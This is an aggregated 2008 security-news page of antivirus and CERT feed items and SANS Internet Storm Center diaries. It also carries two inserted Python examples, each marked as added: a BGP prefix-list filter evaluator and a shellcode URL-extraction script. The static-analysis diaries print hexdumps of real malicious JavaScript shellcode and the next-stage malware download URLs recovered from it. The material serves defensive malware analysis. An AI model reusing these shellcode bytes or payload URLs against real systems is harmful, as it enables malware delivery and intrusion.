Sophos virus news
Norman virus news
Kaspersky virus news
Trendmicro
Panda Software
Symantec
Microsoft Security Updates
Secunia Advisories
Secunia Virus information
Virus Alert information
US-CERT Technical Cyber Security Alerts
US-CERT Cyber Security Alerts
US-CERT Cyber Security Tips
SANS Internet Storm Center
Avira Security News
Avira Latest Threads


Sophos
Sophos monthly Top 10 viruses

Troj/Agent
Troj/Pushdo
W32/Netsky
Troj/Dropr
Mal/Iframe
W32/Traxg
Troj/Clagger
W32/Mytob
W32/MyDoom
W32/Bagle

Sophos latest virus and spyware detection

5 Sep 2008 Troj/Agent-HOY
5 Sep 2008 Troj/Agent-HNY
5 Sep 2008 Troj/Banc-D
5 Sep 2008 Troj/Dloadr-BSI
5 Sep 2008 Troj/Ezio-E
5 Sep 2008 Troj/FakeAV-CV
5 Sep 2008 Troj/Sharp-AA
5 Sep 2008 Troj/Agent-HOW
5 Sep 2008 Troj/Agent-HOX
5 Sep 2008 Troj/FakeAle-GX

Sophos daily Top 10 hoaxes

1 Hotmail hoax
2 Olympic torch
3 MSN is closing down
4 A virtual card for you
5 Bonsai kitten
6 Meninas da Playboy
7 Budweiser frogs screensaver
8 Bill Gates fortune
9 Justice for Jamie
10 Heart attacks and warm water
Information created from
Sophos newsfeeds


Kaspersky Lab, antivirus protection



Panda Software



Keep up to date with the ten most recent syndicated articles from Microsoft Security at Home.
Last updated: Tue, 20 May 2008 22:05:18 GMT
Copyright: ©2006 Microsoft Corporation. All rights reserved.
Recent Security at Home information

Microsoft security updates for May 2008
Learn about and download the latest computer security updates for May 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs.
Published:Tue, 13 May 2008 07:00:00 GMT
Manage family safety settings for Zune
Read how Zune Family Safety Settings allow you to restrict the media your children download or purchase.
Published:Mon, 21 Apr 2008 07:00:00 GMT
Help protect your Windows Live ID
Learn how to protect your Windows Live ID, recognize scams, and block dangerous Web sites.
Published:Fri, 11 Apr 2008 07:00:00 GMT
Microsoft security updates for April 2008
Learn about and download the latest computer security updates for April 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs.
Published:Tue, 08 Apr 2008 07:00:00 GMT
Microsoft security updates for March 2008
Learn about and download the latest computer security updates for March 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs.
Published:Tue, 11 Mar 2008 07:00:00 GMT
Is it safe to install ActiveX controls on my computer?
Learn about what ActiveX controls are, and when it's safe to download them to your computer.
Published:Tue, 12 Feb 2008 08:00:00 GMT
Microsoft security updates for February 2008
Learn about and download the latest computer security updates for January 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs.
Published:Tue, 12 Feb 2008 08:00:00 GMT
Does Windows Live OneCare include the technology behind Windows Defender?
Windows Defender is built in to Windows Live OneCare: No need to install Windows Defender separately.
Published:Thu, 24 Jan 2008 08:00:00 GMT
Microsoft security updates for January 2008
Learn about and download the latest computer security updates for January 2008. Read tips on protecting your computer by using anti-spyware and anti-spam programs.
Published:Tue, 08 Jan 2008 08:00:00 GMT
American Academy of Pediatrics (AAP) partners with Microsoft on online safety for children
Pediatricians worked with Microsoft security to establish guidelines to protect children from Internet threats, such as online predators, hackers, spyware, viruses, and identity theft.
Published:Thu, 13 Dec 2007 08:00:00 GMT
Information created from
Microsoft Security Updates


Information created from
Secunia Advisories


Information created from
Secunia Advisories

VirusAlert, the Dutch-language source for information about computer viruses. The ideal complement to antivirus software. Daily information about computer viruses and hoax messages. In the case of a high-risk virus, you receive information via the free newsletter. Below is information about the latest 10 viruses.
VirusAlert

W32.Rispif.A
W32.Pavsee.a
W32.Koobface.A
Trojan.Wsnpoem
W32.Xpiro
W32.Xpaj
W32.Stayt.A
W32.Emsenush.A
Trojan.Apisnuf
Trojan.Spryct
Trojan.Dwldr-HDN
Information created from
Virus Alert

US-CERT Technical Cyber Security Alerts provide timely information about current security issues, vulnerabilities, and exploits.
US-CERT Technical Cyber Security Alerts

TA08-225A: Microsoft Updates for Multiple Vulnerabilities
TA08-193A: Sun Java Updates for Multiple Vulnerabilities
TA08-190B: Multiple DNS implementations vulnerable to cache poisoning
TA08-190A: Microsoft Updates for Multiple Vulnerabilities
TA08-189A: Microsoft Office Snapshot Viewer ActiveX Vulnerability
TA08-162B: Microsoft Updates for Multiple Vulnerabilities
TA08-162C: Apple Quicktime Updates for Multiple Vulnerabilities
TA08-162A: SNMPv3 Authentication Bypass Vulnerability
TA08-150A: Apple Updates for Multiple Vulnerabilities
TA08-137A: Debian/Ubuntu OpenSSL Random Number Generator Vulnerability
Information created from
US-CERT Tech Alerts

US-CERT Cyber Security Alerts provide timely information about current security issues, vulnerabilities, and exploits. Cyber Security Alerts are released in conjunction with Technical Cyber Security Alerts when there is an issue that affects the general public. Cyber Security Alerts outline the steps and actions that non-technical home and corporate computer users can take to protect themselves from attack.
US-CERT Cyber Security Alerts

SA08-225A: Microsoft Updates for Multiple Vulnerabilities
SA08-193A: Sun Updates for Multiple Vulnerabilities
SA08-190A: Microsoft Updates for Multiple Vulnerabilities
SA08-162B: Microsoft Updates for Multiple Vulnerabilities
SA08-162C: Apple QuickTime Updates for Multiple Vulnerabilities
SA08-150A: Apple Updates for Multiple Vulnerabilities
SA08-149A: Exploitation of Adobe Flash Vulnerability
SA08-134A: Microsoft Updates for Multiple Vulnerabilities
SA08-100A: Adobe Flash updates for Multiple Vulnerabilities
SA08-099A: Microsoft Updates for Multiple Vulnerabilities
Information created from
US-CERT Alerts

US-CERT Cyber Security Tips describe and offer advice about common security issues for non-technical computer users. Tips are restricted to a single topic, although complex issues may span multiple tips. Each tip builds upon the knowledge, both terminology and content, of those published prior to it.
US-CERT Cyber Security Tips

ST05-018: Understanding Voice over Internet Protocol (VoIP)
ST05-017: Cybersecurity for Electronic Devices
ST05-016: Understanding Internationalized Domain Names
ST05-015: Understanding Bluetooth Technology
ST05-014: Real-World Warnings Keep You Safe Online
ST05-013: Guidelines for Publishing Information Online
ST05-012: Supplementing Passwords
ST05-011: Effectively Erasing Files
ST05-010: Understanding Web Site Certificates
ST05-009: Benefits and Risks of Free Email Services
Information created from
US-CERT Cyber Security Tips

SANS Internet Storm Center, InfoCON: green

Google Chrome in Beta, Vulnerabilities Discovered, (Fri, Sep 5th)
Google has released their awaited browser, Chrome, in beta. So far it looks to be Windows-only, but that's likely to change. In the short time it has been out, a few vulnerabilities have been discovered, which isn't a big deal; that's what beta testing is for. You can read about the half-dozen different ones on Bugtraq, for instance. The one area of concern I do have is that they don't have a security page of noteworthiness. The one they do have provides contact info, but nothing on current problems, where to download patches, or discussion of issues. The biggest feature that any software developer should include is support information, especially when the software being developed is a web browser. Other than that, there isn't much to say about Chrome except to wait and see (and to research) on what it does right and what it does wrong and if those privacy concerns out there are really something to worry about. -- John Bambenek bambenek /at/ gmail \dot\ com
E-Mail from SANS/GIAC, (Fri, Sep 5th)
There is an e-mail that went out from GIAC to complete a survey. It uses an IP instead of a name, but the IP points to SurveyMonkey, a third party that was used. This e-mail is legitimate and not a phishing attempt. -- John Bambenek bambenek/at/gmail\dot\com
Wireshark 1.0.3 released, (Thu, Sep 4th)
Wireshark 1.0.3 has been released and fixes several vulnerabilities that affect versions 0.9.7 to 1.0.2 inclusive.
The NCP dissector was susceptible to a number of problems, including buffer overflows and an infinite loop. Versions affected: 0.9.7 to 1.0.2
Wireshark could crash while uncompressing zlib-compressed packet data. Versions affected: 0.10.14 to 1.0.2
Wireshark could crash while reading a Tektronix .rf5 file. Versions affected: 0.99.6 to 1.0.2
Wireshark's full announcement is available here and can be downloaded from here
Cisco Vulnerabilities, (Thu, Sep 4th)
Cisco Security Response: Cisco Secure ACS Denial Of Service Vulnerability
A specially crafted Remote Authentication Dial In User Service (RADIUS) Extensible Authentication Protocol (EAP) Message Attribute packet sent to the Cisco Secure Access Control Server (ACS) can crash the CSRadius and CSAuth processes of Cisco Secure ACS. The full text is available here
Cisco Security Advisory: Remote Access VPN and SIP Vulnerabilities in Cisco PIX and Cisco ASA
Multiple vulnerabilities exist in the Cisco ASA 5500 Series Adaptive Security Appliances and Cisco PIX Security Appliances that may result in a reload of the device or disclosure of confidential information. The full details are available here
New bgp hijack isn't very new., (Wed, Sep 3rd)
Several news sources have been carrying a story about the DEFCON BGP hijack. While that trick was pretty cool it was not new.

Original DEFCON paper is here: http://eng.5ninesdata.com/~tkapela/iphd-2.ppt
Wired article here: http://blog.wired.com/27bstroke6/2008/08/revealed-the-in.html

As Peiter Zatko (aka Mudge of L0pht) is quoted in this article: "I went around screaming my head about this about ten or twelve years ago.... We described this to intelligence agencies and to the National Security Council, in detail."

What is new here? The TTL adjustment was cool and new to me. Getting the data back to the hijacked network was also kind of cool, but prepending isn't new, just not used in this way in the past as far as I know :) The rest is old, very OLD. BGP4 was always capable of directing traffic; that is what it was designed to do. Path-prepending is a technique that's equally well known.

This is not an easy attack, as you need to be trusted by your upstream ISPs. Since those ISPs have neither the interest nor the need to trust their customers to announce only their own BGP information, many ISPs filter what customers can announce to them. Large ISPs are in a position to do it as they are trusted, but have even less motivation in performing BGP hijacking. A successful BGP hijack by a large ISP would result in peers publicly mocking them and front page headlines that would not be good for business. Attracting a substantial amount of traffic and sending it out again is going to get noticed, both on your bandwidth usage, with the potential for a self-inflicted fill-the-pipe DDoS, and by people watching traffic patterns/announcements in BGP.

Here is one of the early BGP hijacks; it was an accident, but in 1997 this accident caused major outages and traffic to be redirected when as7007 hijacked a large portion of the internet.
http://www.merit.edu/mail.archives/nanog/1997-04/msg00444.html

If you want to prevent what they did at DEFCON, implementing the following template should help.
http://www.cymru.com/Documents/secure-bgp-template.html

Additionally ISPs should add router-filter statements (junos)

    policy-statement CUSTOMER.COM.AS201020 { term 10 { from { } } term 20 { }

Or cisco prefix-lists

    ip prefix-list 201020 seq 10 permit 1.1.1.0/22 le 24

To limit what your customers can announce to you. It is described here: http://puck.nether.net/bgp/cisco-config.html

A more complete PKI based solution is being developed by the sidr working group at IETF. Here are several of the drafts; others are available at ietf.org.
http://www.ietf.org/internet-drafts/draft-ietf-sidr-roa-validation-00.txt
http://www.ietf.org/internet-drafts/draft-ietf-sidr-bogons-00.txt
http://www.ietf.org/internet-drafts/draft-ietf-sidr-rescerts-provisioning-03.txt
http://www.ietf.org/internet-drafts/draft-ietf-sidr-rpki-manifests-02.txt

A good collection of BGP security papers is available here: http://www.cs.cmu.edu/~dwendlan/routing/
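
What the Cisco prefix-list line in the diary above accepts and rejects from a customer, as an added example (not part of the diary and not vendor code): a small Python evaluator for `ip prefix-list` entries with ge/le bounds and the implicit deny. The candidate announcements are constructed, the function names are this example's own, and reading 1.1.1.0/22 as 1.1.0.0/22 (host bits masked) is an assumption.

```python
import ipaddress
import re

# Entry syntax handled: ip prefix-list NAME seq N permit|deny PREFIX [ge X] [le Y]
ENTRY = re.compile(
    r"ip prefix-list (\S+) seq (\d+) (permit|deny) (\S+)"
    r"(?: ge (\d+))?(?: le (\d+))?$")

def parse_entry(line):
    """Parse one prefix-list line into (seq, action, network, min_len, max_len)."""
    m = ENTRY.match(line.strip())
    if m is None:
        raise ValueError("not a prefix-list entry: %r" % line)
    _name, seq, action, prefix, ge, le = m.groups()
    # Assumption: host bits are masked off, so 1.1.1.0/22 is read as 1.1.0.0/22.
    net = ipaddress.ip_network(prefix, strict=False)
    # No ge/le: exact length only. "le Y": len..Y. "ge X": X..max. Both: X..Y.
    low = int(ge) if ge else net.prefixlen
    high = int(le) if le else (net.max_prefixlen if ge else net.prefixlen)
    return int(seq), action, net, low, high

def evaluate(entries, announced):
    """Return 'permit' or 'deny' for one announced prefix; first match wins."""
    route = ipaddress.ip_network(announced)
    for _seq, action, net, low, high in sorted(entries, key=lambda e: e[0]):
        if (route.version == net.version and route.subnet_of(net)
                and low <= route.prefixlen <= high):
            return action
    return "deny"  # nothing matched: implicit deny at the end of the list

# The entry from the diary, applied to constructed customer announcements.
CUSTOMER_FILTER = [
    parse_entry("ip prefix-list 201020 seq 10 permit 1.1.1.0/22 le 24"),
]
ANNOUNCEMENTS = [
    "1.1.0.0/22",    # the customer's block itself
    "1.1.2.0/23",    # a more-specific inside the block, within "le 24"
    "1.1.3.0/24",    # the longest prefix the entry allows
    "1.1.3.128/25",  # inside the block but longer than /24
    "1.1.0.0/16",    # covers the block but is not inside it
    "192.0.2.0/24",  # somebody else's address space
]

def report():
    """Map each constructed announcement to the filter's decision."""
    return {a: evaluate(CUSTOMER_FILTER, a) for a in ANNOUNCEMENTS}

if __name__ == "__main__":
    for prefix, verdict in report().items():
        print("%-15s %s" % (prefix, verdict))
```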
Static analysis of Shellcode - Part 2, (Wed, Sep 3rd)
Starting again with a pile of Shellcode, one that the bad guys were even friendly enough to label as such in JavaScript:

Using the same method as before, we take a look at what's inside:

    $ cat bad.js | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' | hexdump -C | more
    00000000 20 20 20 20 76 61 72 20 53 68 65 6c 6c 63 6f 64 |    var Shellcod|
    00000010 65 3d 75 6e 65 73 63 61 70 65 28 22 90 90 90 90 |e=unescape("....|
    00000020 90 33 c0 33 c9 eb 12 5e 66 b9 00 01 8b fe 80 2e |.3.3...^f.......|
    00000030 07 80 36 04 46 e2 f7 eb 05 e8 e9 ff ff ff f4 b5 |..6.F...........|
    00000040 0b 0b 0b 62 67 ac 3b 0b 0b 0b 96 4b 0f 96 7b 1f |...bg.;....K..{.|
    000000c0 3e e6 12 c1 1b 43 fd 77 13 cc d6 10 0e e5 4b f6 |>....C.w......K.|
    000000d0 fc 46 22 78 ea 61 96 61 27 0e e0 69 96 0f 56 96 |.F"x.a.a'..i..V.|
    000000e0 61 1f 0e e0 96 07 96 0e c8 b6 61 64 ce f3 5c 02 |a.........ad..\.|
    000000f0 02 02 91 51 11 ef f0 e6 ef 03 a3 01 95 11 81 e3 |...Q............|
    00000100 ed 7e 39 25 32 7b 73 77 77 7b 45 32 32 7a 7a 7a |.~9%2{sww{E22zzz|
    00000142

Hmm. No URL to be seen. One can GUESS though that there is an URL in there, at the end of the block. URLs have a tell-tale pattern as most start with http://www, so if we see a character sequence that has abbcdeefff, with the same characters repeated, this is most often the start of an encoded URL. In our case above, sww{E22zzz meets this pattern.

The most basic obfuscation used is a simple XOR operation. Finding those is easy enough, you can use a tool like XORSearch that we have covered in an earlier diary. Doesn't work here though. This ain't XOR.

So what's next? Two ways. Either we run the exploit on a vulnerable system and find out what it does (so-called dynamic analysis), or we try to take things one step further with what the Unix command line has to offer, and continue with static analysis. I'm all for command line! First, we need to turn the shellcode into something that a Unix disassembler can understand.
To do so, we take the above code block starting with the 90 90 90 90 sequence, and turn it into a C array:

    $ cat bad.bin | perl -ne 's/(.)/printf "0x%02x,",ord($1)/ge' > bad.c

leaves us with

    0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0x5e,0x66 ....

which is in a nice format to turn it into

    int main() {
    char foo[] = { 0x90,0x90,0x90,0x90,0x90,0x33,0xc0,0x33,0xc9,0xeb,0x12,0x5e,0x66 .... };
    }

which compiles nicely by using

    $ gcc -O0 -fno-inline bad.c -o bad.bin

which in turn can be disassembled by using

    $ objdump --disassembler-options=intel -D bad.bin

The result of this operation is Intel assembly code. If you are used to reverse engineering malware in, say, OllyDbg, this will be quite readable for you. If not, then .. well, not :). A stretch down the assembly pile, we find the following code block

    4005a0: 90           nop
    4005a1: 90           nop
    4005a2: 90           nop
    4005a3: 90           nop
    4005a4: 90           nop
    4005a5: 33 c0        xor eax,eax
    4005a7: 33 c9        xor ecx,ecx
    4005a9: eb 12        jmp 4005bd <C.0.1610+0x1d>
    4005ab: 5e           pop rsi
    4005ac: 66 b9 00 01  mov cx,0x100
    4005b0: 8b fe        mov edi,esi
    4005b2: 80 2e 07     sub BYTE PTR [rsi],0x7
    4005b5: 80 36 04     xor BYTE PTR [rsi],0x4
    4005b8: 46 e2 f7     rexXY loop 4005b2 <C.0.1610+0x12>

This is the byte sequence that we imported from the shell code. And lookie, it appears as if someone is looping over the block and subtracting 7 from every byte before XORing it with 4.
Let's try:

    cat bad.bin | perl -pe 's/(.)/chr((ord($1)-7)^4)/ge' | hexdump -C
    00000000 c2 8d c2 8d c2 8d c2 8d c2 8d 28 c2 bd 28 c3 86 |..........(..(..|
    00000010 c3 a0 0f 53 5b c2 b6 ff 80 8f bf bf bf bf bf bf |...S[...........|
    00000020 bf bf bf bd ff 80 8f bf bf bf bf bf bf bf bf bf |................|
    000001b0 bf bf bf bf bf bf bf bf bf c2 8e 4e 0e c3 ac c3 |...........N....|
    000001c0 ad c3 9b c3 ac ff 80 8f bf bf bf bf bf bf bf bf |................|
    000001d0 bf b8 c2 98 ff 80 8f bf bf bf bf bf bf bf bf bf |................|
    000001e0 be c2 8a 0e 7e c3 98 c3 a2 73 36 1a 2f 70 68 74 |....~....s6./pht|
    000001f0 74 70 3a 2f 2f 77 77 77 2e 79 6f 75 72 6d 65 64 |tp://www.yourmed|
    00000200 73 65 61 72 63 68 2e 69 6e 66 6f 2f 70 73 6b 2f |search.info/psk/|
    00000210 6f 75 74 2e 70 68 70 3f 62 3d 6d 66 73 61 32 30 |out.php?b=mfsa20|
    00000220 30 35 2d 35 30 00 0a 0a |05-50...|

And here is the URL of our next stage in all its questionable glory!

Before you start sinking hours after hours into trying to find URLs in Shellcode, here's the caveat: Not all shellcode contains URLs, and it is kinda hard to find something that isn't there. But if there IS an URL in the shell code, the above should help you find it, without actually having to run the evil code.
Static analysis of Shellcode, (Wed, Sep 3rd)
Two months ago, ISC handler Maarten Van Horenbeeck did a great diary on how to extract exploit content from malicious PDF files. Since we are seeing a steady number of these PDFs and PDF-borne exploit attempts, here's a refresher on how to untangle them. Start with reading Maarten's diary again. Usually, when you are done with extracting the malicious sections and inflating them, you end up with a JavaScript exploit function that contains shell code of sorts. Something like

To untangle these blocks, you can use a simple Perl script

    cat nasty.js | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' | hexdump -C | more

This converts the Unicode (%u...) to actual printable ASCII. Since most of the Unicode block is assembly (shell code), the result won't be pretty, this is why we pipe it in to hexdump. But wait, we are changing %u (hex) to ASCII and then back to a Hexdump? Yes. The reason for this is that the byte order of %uxxyy has to be swapped (yy xx) to get readable text. And hexdump -C also prints ASCII where printable. Thusly:

    00000320 b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec |.d.d...2.d..d...|
    00000330 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 22 20 2b |2d.d.*..-...." +|
    00000340 0d 0a 22 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 |.."..........htt|
    00000350 70 3a 2f 2f 61 6f 6c 63 6f 75 6e 74 65 72 2e 63 |p://aolcounter.c|
    00000360 6f 6d 2f 34 65 5a 6b 37 2f 65 78 65 2e 70 68 70 |om/4eZk7/exe.php|
    00000370 00 22 29 3b 0d 0a 09 76 61 72 20 59 39 49 62 36 |.");...var Y9Ib6|

And lo and behold, we have the name of the next stage EXE that this particular exploit is trying to download. Things are not always this easy though - sometimes, the URL of the next stage is encoded. Time permitting, I'll add an example on how to crack one of those later today.
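
The decoding steps from the two shellcode diaries above, combined into one added Python example (not the handlers' own code): it undoes the %u escaping with the byte swap, finds the http://www repetition pattern the diary describes, and recovers the subtract-then-XOR constants from that crib instead of reading them out of a disassembly. The sample input is constructed around a placeholder URL, all function names are this example's own, and the subtraction is masked to 8 bits so that small byte values wrap the way the `sub BYTE PTR` instruction does.

```python
import re

CRIB = b"http://www"  # most next-stage URLs start like this

def unescape_u(js):
    """Decode %uXXYY escapes; each 16-bit unit is stored low byte first (YY XX)."""
    out = bytearray()
    for hi, lo in re.findall(r"%u([0-9A-Fa-f]{2})([0-9A-Fa-f]{2})", js):
        out += bytes((int(lo, 16), int(hi, 16)))
    return bytes(out)

def shape(chunk):
    """Repetition pattern of a byte string: http://www -> (0,1,1,2,3,4,4,5,5,5)."""
    first = {}
    return tuple(first.setdefault(b, len(first)) for b in chunk)

def crib_offsets(data, crib=CRIB):
    """Offsets whose bytes repeat like the crib; any byte-wise substitution keeps this."""
    want = shape(crib)
    return [i for i in range(len(data) - len(crib) + 1)
            if shape(data[i:i + len(crib)]) == want]

def decode(data, sub, xor):
    """Apply the decoder loop's per-byte operation: subtract, wrap to 8 bits, XOR."""
    return bytes(((b - sub) & 0xFF) ^ xor for b in data)

def recover_keys(window, crib=CRIB):
    """All (sub, xor) pairs that turn the window into the crib; sub=0 is plain XOR."""
    keys = []
    for sub in range(256):
        xor = ((window[0] - sub) & 0xFF) ^ crib[0]  # forced by the first byte
        if decode(window, sub, xor) == crib:
            keys.append((sub, xor))
    return keys

def extract_url(js):
    """Return (sub, xor, url) for the first crib hit that yields a key, else None."""
    data = unescape_u(js)
    for off in crib_offsets(data):
        keys = recover_keys(data[off:off + len(CRIB)])
        if keys:
            sub, xor = keys[0]
            clear = decode(data[off:], sub, xor)
            url = re.match(rb"[\x21-\x7e]+", clear).group().decode("ascii")
            return sub, xor, url
    return None

def make_sample(url, sub=7, xor=4):
    """CONSTRUCTED input: filler bytes plus a NUL-terminated URL, encoded and %u-escaped."""
    body = bytes(range(0x10, 0x30)) + url.encode("ascii") + b"\x00"
    enc = bytes(((b ^ xor) + sub) & 0xFF for b in body)
    enc += b"\x00" * (len(enc) % 2)  # pad to whole 16-bit units
    units = ["%%u%02x%02x" % (enc[i + 1], enc[i]) for i in range(0, len(enc), 2)]
    return 'var Shellcode=unescape("' + "".join(units) + '");'

SAMPLE_URL = "http://www.example.test/out.php?id=1"  # placeholder, not from the diary

if __name__ == "__main__":
    print(extract_url(make_sample(SAMPLE_URL)))
```

More than one key pair can satisfy the crib (subtracting 0x80 more and flipping the top XOR bit gives the same mapping), so `recover_keys` returns every candidate and `extract_url` uses the first.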
OT: Happy Labo(u)r day!, (Mon, Sep 1st)
The first Monday is traditionally the long weekend in North America. As we enjoy our last bit of summer, now might be a good time to either reflect on all of the stuff that is going on at the office or to consider new ways to approach the badness impacting our environments 24/7 365. Cheers, Adrien
MX Records Disappearing?, (Mon, Sep 1st)
A reader wrote in telling us a few big domains (mostly .edu at this point) have had their MX records disappearing. Currently, I've verified the domains that were reported in fact do have problems with their MX records, but is anyone else seeing this? A case of coincidence or a wider attack? If you see any domains that had their MX records suddenly disappear, let me know. -- John Bambenek bambenek /at/ gmail \dot\ com
The Number of Machines Controlled by Botnets Has Jumped 4x in Last 3 Months, (Mon, Sep 1st)
I was perusing some of the data put out by the Shadowserver Foundation that tracks botnets. One piece of information grabbed my eye, namely that over the last 3 months, the number of infected machines quadrupled. During the same time period, there isn't an appreciable increase in new malware, new viruses or anything that would obviously indicate why this is so. I imagine that the bad guys have gotten better about keeping machines owned, but there is one vector that we need to get much better about tracking and managing, and that's direct web-based malware. The timing, very roughly, coincides with when we started to see increased SQL injection attacks against webservers (mind you, this is an educated guess that SQL injections are a big part of this, not a statement of fact). We are very good at tracking email-based malware (including lead-the-user-to-the-bad-website variety) and certainly network based attacks. Short of spidering the web on a consistent basis, it gets difficult to find infected sites for that malware. We at the ISC, and I'm sure many others, are working on ways to honeypot pure web-based attacks to capture this malware, but much work is left to be done. It's one of the disadvantages of operating in a reactive fashion: we are behind the power curve for some time until we figure out a way to approach something close to parity. -- John Bambenek bambenek /at/ gmail \dot\ com
Information created from
SANS Internet Storm Center

Avira - Latest Security News
Free content directory of security related articles. All items are available for publication and can be reprinted free of charge as long as the author box remains intact. Build content for your website quickly and easily! Webmasters can take the articles included in this section and incorporate them on their website at no charge whatsoever, as long as the about the author box remains intact.
Avira - Latest Security News
Last updated: Mon, 01 Sep 2008 11:55:03 +0300

Faked anti-virus solution develops in to a plague
29 August 2008 – A fake anti-virus solution that reports phantasy threats is currently spreading massively and causing annoying alerts. AntiVir protects computers against the phantasy program.

Complete Article - Faked anti-virus solution develops in to a plague

Published:Fri, 29 Aug 2008 00:00 +0300
Avira warns online gamers: be careful with add-ons and automatic game updates
30 July 2008 – Online games are popular, but gamers are frequently the target of cyber criminals.

Complete Article - Avira warns online gamers: be careful with add-ons and automatic game updates

Published:Wed, 30 Jul 2008 00:00 +0300
A backdoor in an alleged Customs declaration
25 July 2008 – Avira warns of bogus mail from Customs: instead of opening the corresponding form the user opens the door for a Trojan which then infects the computer.

Complete Article - A backdoor in an alleged Customs declaration

Published:Fri, 25 Jul 2008 00:00 +0300
"Storm Worm" announces a monetary reform in North America
22 July 2008 – Storm Worm has a new trick focussed on American internet users.

Complete Article - "Storm Worm" announces a monetary reform in North America

Published:Tue, 22 Jul 2008 00:00 +0300
Harmful PDF files have no chance with Avira
21 July 2008 – Avira’s AntiVir is among the few anti-virus solutions that successfully detects harmful PDF documents.

Complete Article - Harmful PDF files have no chance with Avira

Published:Mon, 21 Jul 2008 00:00 +0300
Information created from
Avira RSS Feeds

Avira - Latest Threats Descriptions
Use Avira's Latest Threats RSS to keep track of the newest multi-language malware descriptions posted on our website automatically. For details, please visit our website: www.avira.com.
Avira - Latest Threats Descriptions
Last updated: Fri, 05 Sep 2008 13:05:58 +0200

BDS/Frauder.bu
Danger Level: Low to Medium Threat
VDF version: 7.00.06.89
Published date: Fri, 05 Sep 2008 10:42 +0200
Complete description for this threat can be found here.

Published:Fri, 05 Sep 2008 10:42 +0200
DR/Autoit.I.1
Danger Level: Medium Threat
VDF version: 6.39.01.161
Published date: Fri, 05 Sep 2008 09:44 +0200
Complete description for this threat can be found here.

Published:Fri, 05 Sep 2008 09:44 +0200
TR/Spy.ZBot.DFR
Danger Level: Medium Threat
VDF version: 7.00.06.101
Published date: Tue, 02 Sep 2008 12:10 +0200
Complete description for this threat can be found here.

Published:Tue, 02 Sep 2008 12:10 +0200
TR/VB.aei
Danger Level: Low Threat
VDF version: 6.37.01.186
Published date: Tue, 02 Sep 2008 10:31 +0200
Complete description for this threat can be found here.

Published:Tue, 02 Sep 2008 10:31 +0200
EXP/Java.Gimsh.A.40
Danger Level: Low Threat
VDF version: 7.00.05.183
Published date: Tue, 02 Sep 2008 10:06 +0200
Complete description for this threat can be found here.

Published:Tue, 02 Sep 2008 10:06 +0200
Information created from
Avira RSS Feeds
